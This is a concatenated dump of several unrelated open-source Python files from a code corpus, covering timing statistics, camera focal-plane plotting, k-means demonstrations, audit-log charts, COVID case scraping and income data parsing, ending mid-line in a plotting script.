print('aymp.normal p-value (2-sided)', stats.norm.sf(np.abs(tst.test_stat))*2)
print('aymp.normal p-value (upper)', stats.norm.sf(tst.test_stat))
do_plot=True
if do_plot:
import matplotlib.pyplot as plt
plt.figure()
plt.plot(x, y, '.')
plt.plot(x, res_ols.fittedvalues)
plt.title('OLS fit')
plt.figure()
plt.hist(tst.boots_results.ravel(), bins=20)
plt.title('bootstrap histogram or test statistic')
plt.show()
| bsd-3-clause |
CityPulse/CP_Resourcemanagement | virtualisation/misc/stats.py | 1 | 11883 | '''
Created on 19 Oct 2015
@author: thiggena
'''
from collections import OrderedDict
import csv
import datetime
from matplotlib import pyplot
from virtualisation.misc.buffer import NumericRingBuffer
from virtualisation.misc.jsonobject import JSONObject
PATH = "./"
BUFFER_SIZE = 1000
class Element(object):
def __init__(self, name):
self.name = name
def finish(self):
return "Name: " + self.name
class TimeElement(Element):
def __init__(self, name, value=0):
super(TimeElement, self).__init__(name)
self.buffer = NumericRingBuffer(BUFFER_SIZE)
[self.buffer.add(0) for _i in range(0, value)]
self.startTime = None
def started(self, test=False):
if self.startTime:
return True
return False
def start(self):
if self.startTime is None:
self.startTime = datetime.datetime.now()
else:
print self.name, "already started!"
def stop(self, stoptime):
if self.startTime is not None:
self.buffer.add((stoptime - self.startTime).total_seconds())
self.startTime = None
else:
print "TimeElement", self.name, "already stopped"
def finish(self):
print super(TimeElement, self).finish()
print "Mean:", self.mean()
return super(TimeElement, self).finish()
def mean(self):
return self.buffer.mean()
def sum(self):
return sum(self.buffer)
def getData(self, name):
return (name, self.buffer)
def insertNotUsedValue(self, values=0):
for _i in range(0, (values-self.buffer.len())):
self.buffer.add(0)
class TimeElementList(TimeElement):
def __init__(self, name, value=0):
super(TimeElementList, self).__init__(name, value)
self.timeElementMap = {}
def getData(self, name):
dataList = []
for element in self.timeElementMap:
dataList.append(self.timeElementMap[element].getData(name + "." + element))
dataList.append(super(TimeElementList, self).getData(name))
return dataList
def startElement(self,categoryList):
timeElementList = None
if categoryList[0] in self.timeElementMap:
timeElementList = self.timeElementMap[categoryList[0]]
else:
timeElementList = TimeElementList(categoryList[0], self.buffer.len())
timeElementList.start()
self.timeElementMap[categoryList[0]] = timeElementList
if not timeElementList.started():
timeElementList.start()
if len(categoryList) > 1:
timeElementList.startElement(categoryList[1:])
def stopElement(self, categoryList, stoptime):
if categoryList[0] in self.timeElementMap:
timeElementList = self.timeElementMap[categoryList[0]]
if len(categoryList) > 1:
timeElementList.stopElement(categoryList[1:], stoptime)
else:
if timeElementList.started():
timeElementList.stop(stoptime)
def start(self):
super(TimeElementList, self).start()
def stop(self, stoptime):
super(TimeElementList, self).stop(stoptime)
[e.stop(stoptime) for e in self.timeElementMap.values() if e.started(True)]
self.insertNotUsedValue(self.buffer.len())
def insertNotUsedValue(self, values=0):
super(TimeElementList, self).insertNotUsedValue(values)
[e.insertNotUsedValue(values) for e in self.timeElementMap.values()]
def finish(self):
super(TimeElementList, self).finish()
for e in self.timeElementMap:
self.timeElementMap[e].finish()
# def writeCSVFile(self, name):
# data = self.getData(self.name)
# tuples = []
# for e in data:
# self.parse(e, tuples)
#
# csvfile = open(PATH + str(name) + "_" + str(self.name) + ".csv", 'w')
# csvf = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
#
# header = []
# maxEntries = 0
# for e in tuples:
# header.append(e[0])
# maxEntries = max(maxEntries, e[1].len())
# csvf.writerow(header)
#
# for i in range(0, maxEntries):
# row = []
# for e in tuples:
# data = e[1]
# if data.len() >= i+1:
# row.append(data.items[i])
# else:
# row.append("")
# csvf.writerow(row)
# csvfile.close()
def parse(self, data, tuples):
if isinstance(data, list):
for e in data:
self.parse(e, tuples)
else:
tuples.append(data)
def getAverageProcessingTimes(self):
job = JSONObject()
job.name = self.name
job.value = self.mean()
if len(self.timeElementMap) > 0:
job.values = []
for element in self.timeElementMap:
if len(self.timeElementMap[element].timeElementMap) > 0:
job.values.append(self.timeElementMap[element].getAverageProcessingTimes())
else:
job2 = JSONObject()
job2.name = element
job2.value = self.timeElementMap[element].mean()
job.values.append(job2)
return job
class CounterElement(Element):
def __init__(self, name):
super(CounterElement, self).__init__(name)
self.counter = 0
self.counterMap = OrderedDict()
def count(self, timestamp=None):
self.counter += 1
if timestamp:
self.counterMap[timestamp] = self.counter
else:
self.counterMap[datetime.datetime.now()] = self.counter
# def writeCSVFile(self, name):
# csvfile = open(PATH + name + "_" + self.name + "_count.csv", 'w')
# csvf = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
# header = ["date", "count"]
# csvf.writerow(header)
# for element in self.counterMap:
# csvf.writerow([element, self.counterMap[element]])
# csvfile.close()
class SizeElement(Element):
def __init__(self, name):
super(SizeElement, self).__init__(name)
self.items = OrderedDict()
def addItem(self, time, value):
self.items[time] = value
def finish(self):
print super(SizeElement, self).finish()
for item in self.items:
print item, self.items[item]
def plot(self, name):
x = self.items.keys()
y = self.items.values()
pyplot.plot(x, y)
print "x", x, min(x), max(x)
print "y", y, min(y), max(y)
pyplot.axis([min(x), max(x), min(y), max(y)])
pyplot.savefig(PATH + name + "_" + self.name+ ".png")
def getData(self, name):
return (name, self.items)
# def writeCSVFile(self, name):
# csvfile = open(PATH + name + "_" + self.name + "_size.csv", 'w')
# csvf = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
# header = ["date", "value"]
# csvf.writerow(header)
# for element in self.items:
# csvf.writerow([element, self.items[element]])
# csvfile.close()
class Stats(object):
instances = {}
def __new__(cls, name):
if name not in Stats.instances:
Stats.instances[name] = Stats.__Stats(name)
return Stats.instances[name]
@classmethod
def getOrMake(cls, name):
if name not in Stats.instances:
Stats.instances[name] = Stats.__Stats(name)
return Stats.instances[name]
@classmethod
def getAllStats(cls):
return Stats.instances.values()
@classmethod
def get(cls, name):
if name in Stats.instances:
return Stats.instances[name]
return None
# @classmethod
# def writeCSVs(cls):
# for e in Stats.instances.values():
# e.writeCSVFiles()
@classmethod
def finish(cls):
jobs = JSONObject()
jobs.stats = []
for e in Stats.instances:
job = JSONObject()
job.name = e
job.value = e.getvalue()
jobs.stats.append(job)
return jobs
class __Stats(object):
def __init__(self, name):
self.name = name
self.elements = {}
def finish(self):
print "Stats for", self.name
for e in self.elements:
self.elements[e].finish()
# def writeCSVFiles(self):
# for e in self.elements:
# self.elements[e].writeCSVFile(self.name)
def addSize(self, name, time, value):
if name not in self.elements:
element = SizeElement(name)
self.elements[name] = element
else:
element = self.elements[name]
element.addItem(time, value)
def count(self, name, timestamp=None):
if name not in self.elements:
element = CounterElement(name)
self.elements[name] = element
else:
element = self.elements[name]
element.count(timestamp)
def startMeasurement(self, categoryString):
categories = categoryString.split(".")
timeElementList = None
if categories[0] in self.elements:
timeElementList = self.elements[categories[0]]
else:
timeElementList = TimeElementList(categories[0])
self.elements[categories[0]] = timeElementList
if not timeElementList.started():
timeElementList.start()
if len(categories) > 1:
timeElementList.startElement(categories[1:])
def stopMeasurement(self, categoryString):
stoptime = datetime.datetime.now()
categories = categoryString.split(".")
if categories[0] in self.elements:
timeElementList = self.elements[categories[0]]
if len(categories) > 1:
timeElementList.stopElement(categories[1:], stoptime)
else:
if timeElementList.started():
timeElementList.stop(stoptime)
else:
print "cannot stop element", categories[0], ", related elements not stopped yet"
def getAverageProcessingTimes(self):
times = []
for element in self.elements:
if isinstance(self.elements[element], TimeElementList):
times.append(self.elements[element].getAverageProcessingTimes())
return times
# if __name__ == '__main__':
# from time import sleep
# s = Stats("test")
# for i in range(0, 10):
# s.startMeasurement("method")
# # print i
# if i is 0:
# s.startMeasurement("method.if")
# sleep(0.0005)
# s.startMeasurement("method.if.test")
# sleep(0.0005)
# s.stopMeasurement("method.if.test")
# s.stopMeasurement("method.if")
#
# else:
# s.startMeasurement("method.else")
# sleep(0.0005)
# s.stopMeasurement("method.else")
# s.stopMeasurement("method")
# print s.getAverageProcessingTimes()[0].dumps()
# print "#####"
#
# s.writeCSVFiles()
| mit |
HSC-Users/hscTools | bick/bin/camPlot.py | 2 | 6927 | #!/usr/bin/env python
# Original filename: camPlot.py
#
# Author: Steve Bickerton
# Email:
# Date: Tue 2013-12-31 13:02:29
#
# Summary:
#
import sys
import os
import re
import math
import argparse
import numpy
import datetime
import matplotlib.figure as figure
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigCanvas
import lsst.pex.policy as pexPolicy
import lsst.afw.cameraGeom as afwCG
import lsst.afw.cameraGeom.utils as afwCGU
import hsc.tools.bick.utils as hscUtil
#############################################################
#
# Main body of code
#
#############################################################
def main(infile, ccds=None, camera="hsc", cmap="copper", cols=[0,1],
nsig=3.0, percent=False, textcolor='k', out=None):
###########################
# build the camera
policy_file = {
'hsc': os.path.join(os.getenv("OBS_SUBARU_DIR"), "hsc", "hsc_geom.paf"),
'sc' : os.path.join(os.getenv("OBS_SUBARU_DIR"), "suprimecam", "Full_Suprimecam_geom.paf")
}
geomPolicy = afwCGU.getGeomPolicy(policy_file[camera.lower()])
camera = afwCGU.makeCamera(geomPolicy)
###########################
# load the data
data = {}
if infile:
load = numpy.loadtxt(infile)
vals = load[:,cols[1]]
for i in range(len(vals)):
ccd = int(load[i,cols[0]])
if len(cols) == 3:
amp = int(load[i,cols[2]])
else:
amp = 0
if ccd not in data:
data[ccd] = {}
data[ccd][amp] = vals[i]
else:
vals = []
for r in camera:
for c in afwCG.cast_Raft(r):
ccd = afwCG.cast_Ccd(c)
ccdId = ccd.getId().getSerial()
data[ccdId] = {}
val = 1.0
if ccdId > 103:
val = 0.8
for a in ccd:
amp = afwCG.cast_Amp(a)
ampId = amp.getId().getSerial() - 1
data[ccdId][ampId] = val
vals.append(val)
if len(data[ccdId]) == 0:
data[ccdId][0] = val
vals.append(val)
vals = numpy.array(vals)
mean = vals.mean()
med = numpy.median(vals)
std = vals.std()
vmin, vmax = med - nsig*std, med+nsig*std
###########################
# make the plot
fig = figure.Figure(figsize=(7,7))
canvas = FigCanvas(fig)
if infile:
rect = (0.06, 0.12, 0.76, 0.76)
else:
rect = (0.06, 0.06, 0.88, 0.88)
fpa_fig = hscUtil.FpaFigure(fig, camera, rect=rect)
for i_ccd, amplist in data.items():
hide = False
if ccds and (i_ccd not in ccds):
hide = True
ax = fpa_fig.getAxes(i_ccd)
fpa_fig.highlightAmp(i_ccd, 0)
nq = fpa_fig.detectors[i_ccd].getOrientation().getNQuarter()
nx, ny = 4, 8
if nq % 2:
ny, nx = nx, ny
firstAmp = sorted(amplist.keys())[0]
im = numpy.zeros((ny, nx)) + amplist[firstAmp]
print i_ccd
for amp, val in amplist.items():
useVal = val
if hide:
useVal = 0.0
if nq == 0:
im[:,amp] = useVal
if nq == 1 or nq == -3:
im[3-amp,:] = useVal
if nq == 2:
im[:,3-amp] = useVal
if nq == -1 or nq == 3:
im[amp,:] = useVal
im_ax = ax.imshow(im, cmap=cmap, vmax=vmax, vmin=vmin, interpolation='nearest')
fpa_fig.addLabel(i_ccd, [str(i_ccd)], color=textcolor)
#############################
# the colorbar
ylo, yhi = vmin, vmax
if infile:
rect = (0.91, 0.25, 0.02, 0.6)
# real units
cax = fig.add_axes(rect)
cax.get_yaxis().get_major_formatter().set_useOffset(False)
cax.set_ylim([ylo, yhi])
cax.get_xaxis().set_ticks([])
cbar = fig.colorbar(im_ax, cax=cax)
# mirror the values. std or in percent (fractional) if requested
caxp = cax.twinx()
caxp.get_xaxis().set_ticks([])
caxp.get_yaxis().get_major_formatter().set_useOffset(False)
if percent:
caxp.set_ylim([(med-ylo)/(yhi-ylo), (yhi-med)/(yhi-ylo)])
else:
caxp.set_ylim([-nsig*std, nsig*std])
for t in cax.get_yticklabels():
t.set_size('small')
for t in caxp.get_yticklabels():
t.set_size("small")
#################################
# add stats
if infile:
stats = {"Mean":mean, "Med":med, "Std":std, "Max":vals.max(), "Min":vals.min()}
order = ["Mean", "Med", "Std", "Min", "Max"]
i = 0
for k in order:
v = stats[k]
ax.text(0.8, 0.03+0.02*i, "%-10s %.3g"%(k+":",v), fontsize=9,
horizontalalignment='left', verticalalignment='center', transform=fig.transFigure)
i += 1
#################################
# title and write it
date = datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
title = "File: %s Cols: %s %s" % (infile, ":".join([str(x+1) for x in cols]), date) if infile else ""
fig.suptitle(title)
outfile = out if out else "camview-%s.png" % infile
fig.savefig(outfile)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--version", action='version', version="0.0")
parser.add_argument("infile", type=str, help="")
parser.add_argument("-C", "--camera", type=str, default="hsc", choices=("hsc","sc","lsst"), help="")
parser.add_argument("-m", "--cmap", type=str, default="copper",
choices=("copper","gray","jet", "prism"), help="")
parser.add_argument("-d", "--datacols", type=str, default="1:2", help="Columns format='CCD:datavalue'")
parser.add_argument("-n", "--nsig", type=float, default=3.0, help="N standard devs for cmap")
parser.add_argument("-p", "--percent", default=False, action='store_true',
help="display percent on complementary colorbar")
parser.add_argument("-c", "--ccds", default=None, help="Ccds to show")
parser.add_argument("-t", "--textcolor", default='k', help="Color for labels")
parser.add_argument("-o", "--out", default=None, help="Output plot name")
args = parser.parse_args()
infile = None if args.infile == 'none' else args.infile
cols = [int(x)-1 for x in args.datacols.split(":")]
ccds=None
if args.ccds:
ccds = set([int(x) for x in hscUtil.idSplit(args.ccds)])
main(infile, ccds=ccds, camera=args.camera, cmap=args.cmap, cols=cols,
nsig=args.nsig, percent=args.percent, textcolor=args.textcolor, out=args.out)
| gpl-3.0 |
Caoimhinmg/PmagPy | programs/__init__.py | 1 | 1484 | #!/usr/bin/env pythonw
from __future__ import print_function
from __future__ import absolute_import
import sys
from os import path
import pkg_resources
command = path.split(sys.argv[0])[-1]
from .program_envs import prog_env
if command.endswith(".py"):
mpl_env = prog_env.get(command[:-3])
elif command.endswith("_a"):
mpl_env = prog_env.get(command[:-2])
else:
mpl_env = prog_env.get(command)
import matplotlib
if mpl_env:
matplotlib.use(mpl_env)
else:
matplotlib.use("TKAgg")
if "-v" in sys.argv:
print("You are running:")
try:
print(pkg_resources.get_distribution('pmagpy'))
except pkg_resources.DistributionNotFound:
pass
try:
print(pkg_resources.get_distribution('pmagpy-cli'))
except pkg_resources.DistributionNotFound:
pass
#from . import generic_magic
#from . import sio_magic
#from . import cit_magic
#from . import _2g_bin_magic
#from . import huji_magic
#from . import huji_magic_new
#from . import ldeo_magic
#from . import iodp_srm_magic
#from . import iodp_dscr_magic
#from . import iodp_samples_magic
#from . import pmd_magic
#from . import tdt_magic
#from . import jr6_jr6_magic
#from . import jr6_txt_magic
#from . import bgc_magic
#__all__ = [generic_magic, sio_magic, cit_magic, _2g_bin_magic, huji_magic,
# huji_magic_new, ldeo_magic, iodp_srm_magic, iodp_dscr_magic,
# pmd_magic, tdt_magic, jr6_jr6_magic, jr6_txt_magic, bgc_magic,
# iodp_samples_magic]
| bsd-3-clause |
roxyboy/scikit-learn | examples/cluster/plot_kmeans_assumptions.py | 270 | 2040 | """
====================================
Demonstration of k-means assumptions
====================================
This example is meant to illustrate situations where k-means will produce
unintuitive and possibly unexpected clusters. In the first three plots, the
input data does not conform to some implicit assumption that k-means makes and
undesirable clusters are produced as a result. In the last plot, k-means
returns intuitive clusters despite unevenly sized blobs.
"""
print(__doc__)
# Author: Phil Roth <mr.phil.roth@gmail.com>
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
plt.figure(figsize=(12, 12))
n_samples = 1500
random_state = 170
X, y = make_blobs(n_samples=n_samples, random_state=random_state)
# Incorrect number of clusters
y_pred = KMeans(n_clusters=2, random_state=random_state).fit_predict(X)
plt.subplot(221)
plt.scatter(X[:, 0], X[:, 1], c=y_pred)
plt.title("Incorrect Number of Blobs")
# Anisotropicly distributed data
transformation = [[ 0.60834549, -0.63667341], [-0.40887718, 0.85253229]]
X_aniso = np.dot(X, transformation)
y_pred = KMeans(n_clusters=3, random_state=random_state).fit_predict(X_aniso)
plt.subplot(222)
plt.scatter(X_aniso[:, 0], X_aniso[:, 1], c=y_pred)
plt.title("Anisotropicly Distributed Blobs")
# Different variance
X_varied, y_varied = make_blobs(n_samples=n_samples,
cluster_std=[1.0, 2.5, 0.5],
random_state=random_state)
y_pred = KMeans(n_clusters=3, random_state=random_state).fit_predict(X_varied)
plt.subplot(223)
plt.scatter(X_varied[:, 0], X_varied[:, 1], c=y_pred)
plt.title("Unequal Variance")
# Unevenly sized blobs
X_filtered = np.vstack((X[y == 0][:500], X[y == 1][:100], X[y == 2][:10]))
y_pred = KMeans(n_clusters=3, random_state=random_state).fit_predict(X_filtered)
plt.subplot(224)
plt.scatter(X_filtered[:, 0], X_filtered[:, 1], c=y_pred)
plt.title("Unevenly Sized Blobs")
plt.show()
| bsd-3-clause |
jh23453/privacyidea | privacyidea/lib/stats.py | 3 | 5545 | # -*- coding: utf-8 -*-
#
# 2015-07-16 Initial writeup
# (c) Cornelius Kölbel
# License: AGPLv3
# contact: http://www.privacyidea.org
#
# This code is free software; you can redistribute it and/or
# modify it under the terms of the GNU AFFERO GENERAL PUBLIC LICENSE
# License as published by the Free Software Foundation; either
# version 3 of the License, or any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU AFFERO GENERAL PUBLIC LICENSE for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
__doc__ = """This module reads audit data and can create statistics from
audit data using pandas.
This module is tested in tests/test_lib_stats.py
"""
import logging
from privacyidea.lib.log import log_with
import datetime
import StringIO
log = logging.getLogger(__name__)
try:
import matplotlib
MATPLOT_READY = True
matplotlib.style.use('ggplot')
matplotlib.use('Agg')
except Exception as exx:
MATPLOT_READY = False
log.warning("If you want to see statistics you need to install python "
"matplotlib.")
customcmap = [(1, 0, 0), (0, 1, 0), (0, 0, 1)]
@log_with(log)
def get_statistics(auditobject, start_time=datetime.datetime.now()
-datetime.timedelta(days=7),
end_time=datetime.datetime.now()):
"""
Create audit statistics and return a JSON object
The auditobject is passed from the upper level, usually from the REST API
as g.auditobject.
:param auditobject: The audit object
:type auditobject: Audit Object as defined in auditmodules.base.Audit
:return: JSON
"""
result = {}
df = auditobject.get_dataframe(start_time=start_time, end_time=end_time)
# authentication successful/fail per user or serial
for key in ["user", "serial"]:
result["validate_{0!s}_plot".format(key)] = _get_success_fail(df, key)
# get simple usage
for key in ["serial", "action"]:
result["{0!s}_plot".format(key)] = _get_number_of(df, key)
# failed authentication requests
for key in ["user", "serial"]:
result["validate_failed_{0!s}_plot".format(key)] = _get_fail(df, key)
result["admin_plot"] = _get_number_of(df, "action", nums=20)
return result
def _get_success_fail(df, key):
try:
output = StringIO.StringIO()
series = df[df.action.isin(["POST /validate/check",
"GET /validate/check"])].groupby([key,
'success']).size().unstack()
fig = series.plot(kind="bar", stacked=True,
legend=True,
title="Authentications",
grid=True,
color=customcmap).get_figure()
fig.savefig(output, format="png")
o_data = output.getvalue()
output.close()
image_data = o_data.encode("base64")
image_uri = 'data:image/png;base64,{0!s}'.format(image_data)
except Exception as exx:
log.info(exx)
image_uri = "{0!s}".format(exx)
return image_uri
def _get_fail(df, key):
try:
output = StringIO.StringIO()
series = df[(df.success==0)
& (df.action.isin(["POST /validate/check",
"GET /validate/check"]))][
key].value_counts()[:5]
plot_canvas = matplotlib.pyplot.figure()
ax = plot_canvas.add_subplot(1,1,1)
fig = series.plot(ax=ax, kind="bar",
colormap="Reds",
stacked=False,
legend=False,
grid=True,
title="Failed Authentications").get_figure()
fig.savefig(output, format="png")
o_data = output.getvalue()
output.close()
image_data = o_data.encode("base64")
image_uri = 'data:image/png;base64,{0!s}'.format(image_data)
except Exception as exx:
log.info(exx)
image_uri = "{0!s}".format(exx)
return image_uri
def _get_number_of(df, key, nums=5):
"""
return a data url image with a single keyed value.
It plots the "nums" most occurrences of the "key" column in the dataframe.
:param df: The DataFrame
:type df: Pandas DataFrame
:param key: The key, which should be plotted.
:param count: how many of the most often values should be plotted
:return: A data url
"""
output = StringIO.StringIO()
output.truncate(0)
try:
plot_canvas = matplotlib.pyplot.figure()
ax = plot_canvas.add_subplot(1, 1, 1)
series = df[key].value_counts()[:nums]
fig = series.plot(ax=ax, kind="bar", colormap="Blues",
legend=False,
stacked=False,
title="Numbers of {0!s}".format(key),
grid=True).get_figure()
fig.savefig(output, format="png")
o_data = output.getvalue()
output.close()
image_data = o_data.encode("base64")
image_uri = 'data:image/png;base64,{0!s}'.format(image_data)
except Exception as exx:
log.info(exx)
image_uri = "No data"
return image_uri
| agpl-3.0 |
keflavich/TurbuStat | turbustat/analysis/comparison_plot.py | 1 | 7136 | # Licensed under an MIT open source license - see LICENSE
import numpy as np
import os
import matplotlib.pyplot as p
from pandas import read_csv
def comparison_plot(path, num_fids=5, verbose=False, obs=False,
statistics=["Wavelet", "MVC", "PSpec", "Bispectrum",
"DeltaVariance", "Genus", "VCS",
"VCS_Density", "VCS_Velocity", "VCA",
"Tsallis", "PCA", "SCF", "Cramer",
"Skewness", "Kurtosis", "Dendrogram_Hist",
"Dendrogram_Num"]):
'''
Requires results converted into csv form!!
This function plots a comparison of the distances between the different
simulations and the fiducial runs. All face combinations are checked for
in the given path. The plots adjust to the available amount of data.
Parameters
----------
path : str
Path to folder containing the HDF5 files with the distance results.
analysis_fcn : function, optional
Function to apply to the time-step data.
verbose : bool, optional
Enables plotting.
cross_compare : bool, optional
Include comparisons between faces.
statistics : list, optional
Statistics to plot. Default is all.
'''
# All possible face combinations
data_files = {"0_0": ["Face 0 to 0"],
"1_1": ["Face 1 to 1"],
"2_2": ["Face 2 to 2"],
"0_1": ["Face 0 to 1"],
"0_2": ["Face 0 to 2"],
"1_2": ["Face 1 to 2"],
"2_1": ["Face 2 to 1"],
"2_0": ["Face 2 to 0"],
"1_0": ["Face 1 to 0"]}
order = ["0_0", "0_1", "0_2", "1_0", "1_1", "1_2", "2_0", "2_1", "2_2"]
if obs:
data_files["0_obs"] = ["Face 0 to Obs"],
data_files["1_obs"] = ["Face 1 to Obs"],
data_files["2_obs"] = ["Face 2 to Obs"],
# Read in the data and match it to one of the face combinations.
for x in os.listdir(path):
if not os.path.isfile(os.path.join(path, x)):
continue
if not x[-3:] == "csv":
continue
for key in data_files.keys():
if key in x:
data = read_csv(os.path.join(path, x))
data_files[key].append(data)
break
# Now delete the keys with no data
for key in data_files.keys():
if len(data_files[key]) == 1:
del data_files[key]
order.remove(key)
if data_files.keys() == []:
print "No csv files found in %s" % (path)
return
for stat in statistics:
# Divide by 2 b/c there should be 2 files for each comparison b/w faces
(fig, ax), shape = _plot_size(len(data_files.keys()))
for k, key in enumerate(order):
bottom = False
if shape[0] % (k + 1) == 0:
bottom = True
_plotter(ax[k], data_files[key][1][stat], data_files[key][2][stat],
num_fids, data_files[key][0], stat, bottom)
ax.reshape(shape)
if verbose:
fig.show()
else:
fig.savefig("distance_comparisons_" + stat + ".pdf")
fig.clf()
def _plot_size(num):
if num <= 3:
return p.subplots(num, sharex=True), (num, 1)
elif num > 3 and num <= 8:
return p.subplots(num), (num / 2 + num % 2, 2)
elif num == 9:
return p.subplots(num), (3, 3)
else:
print "There should be a maximum of 9 comparisons."
return
def _plotter(ax, data, fid_data, num_fids, title, stat, bottom):
num_design = (max(data.shape) / num_fids)
x_vals = np.arange(0, num_design)
xtick_labels = [str(i) for i in x_vals]
fid_labels = [str(i) for i in range(num_fids-1)]
# Plot designs
for i in range(num_fids):
y_vals = data.ix[int(i * num_design):int(((i + 1) * num_design)-1)]
ax.plot(x_vals, y_vals, "-o", label="Fiducial " + str(i), alpha=0.6)
# Set title in upper left hand corner
ax.annotate(title, xy=(0, 1), xytext=(12, -6), va='top',
xycoords='axes fraction', textcoords='offset points',
fontsize=12, alpha=0.75)
# Set the ylabel using the stat name. Replace underscores
ax.set_ylabel(stat.replace("_", " ")+"\nDistance", fontsize=10,
multialignment='center')
# If the plot is on the bottom of a column, add labels
if bottom:
# Put two 'labels' for the x axis
ax.annotate("Designs", xy=(0, 0), xytext=(8 * (num_design / 2), -20),
va='top', xycoords='axes fraction',
textcoords='offset points',
fontsize=10)
ax.annotate("Fiducials", xy=(0, 0), xytext=(20 * (num_design / 2), -20),
va='top', xycoords='axes fraction',
textcoords='offset points',
fontsize=10)
#Plot fiducials
# fid_comps = (num_fids**2 + num_fids) / 2
x_fid_vals = np.arange(num_design, num_design + num_fids)
prev = 0
for i, posn in enumerate(np.arange(num_fids - 1, 0, -1)):
ax.plot(x_fid_vals[:len(x_fid_vals)-i-1],
fid_data[prev:posn+prev], "ko", alpha=0.6)
prev += posn
# Make the legend
ax.legend(loc="upper right", prop={'size': 10})
ax.set_xlim([-1, num_design + num_fids + 8])
ax.set_xticks(np.append(x_vals, x_fid_vals))
ax.set_xticklabels(xtick_labels+fid_labels, rotation=90, size=10)
def timestep_comparisons(path, verbose=False):
'''
Use pandas built-in plotting to look at the variation across time-steps.
Parameters
----------
path : str
Path to files.
verbose : bool, optional
Enables plotting.
'''
data_files = [os.path.join(path, x) for x in os.listdir(path) if os.path.isfile(os.path.join(path, x))
and x[-2:] == "h5"]
if len(data_files) == 0:
print "The inputed path contains no HDF5 files."
return None
data = [HDFStore(filename) for filename in data_files]
for key in data[0].keys():
for i, dataset in enumerate(data):
# p.subplot(3,3,i)
df = dataset[key].sort(axis=0).sort(axis=1)
df.T.plot(style="D--")
p.legend(prop={'size': 8}, loc="best")
p.title(str(key)[1:])
locs, xlabels = p.xticks(size=8)
p.setp(xlabels, rotation=70)
if verbose:
p.show()
else:
p.savefig(
"timestep_comparisons_" + str(data_files[i][38:-19]) + "_" + str(key[1:]) + ".pdf")
p.close()
def num_fiducials(N):
'''
Return the number of fiducials based on the number of lines in the
comparison file.
Parameters
----------
N : int
Number of rows in the data frame.
'''
n = 1
while n < N:
if n * (n - 1) == 2 * N:
return n - 1
else:
n += 1
return "Doesn't factor into an integer value."
| mit |
mobarski/sandbox | covid19/xxx_crawl_data.py | 1 | 1696 | from pprint import pprint
import requests
import re
import json
from math import log
# TESTY: https://ourworldindata.org/coronavirus#testing-for-covid-19
# INNE: https://www.worldometers.info/coronavirus/country/{country}/
def get_stats(country):
out = {}
url = f"https://www.worldometers.info/coronavirus/country/{country}/"
resp = requests.get(url)
raw = re.findall("(?sm)series:\s+\[\{.+?data:.+?]", resp.text)
for serie in raw:
name = re.findall("name:\s*'(.+?)'",serie)[0]
data = re.findall("data:\s*(\[.+?\])",serie)[0].replace('null','0')
data = json.loads(data)
out[name] = data
return out
if __name__=="__main__":
from matplotlib import pyplot as plt
from statistics import *
plt.rcParams["axes.prop_cycle"] = plt.cycler("color", plt.cm.tab20.colors)
min_value = 10
by_country = {}
min_len = None
#STAT = 'Deaths'
#STAT = 'Cases'
STAT = 'Daily Cases'
#for country in ['poland','italy','france','germany','turkey','uk','sweden','romania','bulgaria','czech-republic','us','canada']:
for country in ['poland','italy','france','germany','turkey','uk','sweden','romania','us','canada']:
stats = get_stats(country)
#pprint(stats); exit()
stat = stats[STAT]
stat = [x for x in stat if x>=min_value]
min_len = min(min_len or len(stat), len(stat))
by_country[country] = stat
print(country,len(stat),stat)
for c in by_country:
stat = by_country[c]
#stat = stat[:min_len]
#stat = [a/b for a,b in zip(stat[1:],stat)]
stat = [mean(stat[i:i+10]) for i in range(len(stat)-10)][:-1]
plt.plot(range(len(stat)), stat, label=c, linewidth=3)
plt.yscale('log')
plt.legend()
plt.title(f'{STAT.lower()} after {min_value} {STAT.lower()}')
plt.show()
| mit |
johnmwalters/ThinkStats2 | code/hinc.py | 67 | 1494 | """This file contains code used in "Think Stats",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function
import numpy as np
import pandas
import thinkplot
import thinkstats2
def Clean(s):
"""Converts dollar amounts to integers."""
try:
return int(s.lstrip('$').replace(',', ''))
except ValueError:
if s == 'Under':
return 0
elif s == 'over':
return np.inf
return None
def ReadData(filename='hinc06.csv'):
"""Reads filename and returns populations in thousands
filename: string
returns: pandas Series of populations in thousands
"""
data = pandas.read_csv(filename, header=None, skiprows=9)
cols = data[[0, 1]]
res = []
for _, row in cols.iterrows():
label, freq = row.values
freq = int(freq.replace(',', ''))
t = label.split()
low, high = Clean(t[0]), Clean(t[-1])
res.append((high, freq))
df = pandas.DataFrame(res)
# correct the first range
df[0][0] -= 1
# compute the cumulative sum of the freqs
df[2] = df[1].cumsum()
# normalize the cumulative freqs
total = df[2][41]
df[3] = df[2] / total
# add column names
df.columns = ['income', 'freq', 'cumsum', 'ps']
return df
def main():
df = ReadData()
print(df)
if __name__ == "__main__":
main()
| gpl-3.0 |
keiserlab/e3fp-paper | project/analysis/experiments/make_supp_mat.py | 1 | 11385 | """Create supporting info experimental curves and binding summary table.
Author: Seth Axen
E-mail: seth.axen@gmail.com
"""
import os
import glob
import math
from collections import Counter
from matplotlib import pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
from e3fp_paper.plotting.defaults import DefaultColors
from e3fp_paper.plotting.experiments import data_df_from_file, \
fit_df_from_file, \
plot_experiments, \
plot_schild
from e3fp_paper.plotting.util import add_panel_labels
RESULTS_DIR = "../../experiment_prediction/results"
BINDING_POOL_DATA_FILES = glob.glob(os.path.join(RESULTS_DIR,
"*binding*/*pool*data.txt"))
BINDING_DATA_FILES = [x for x in glob.glob(os.path.join(RESULTS_DIR,
"*binding*/*data.txt"))
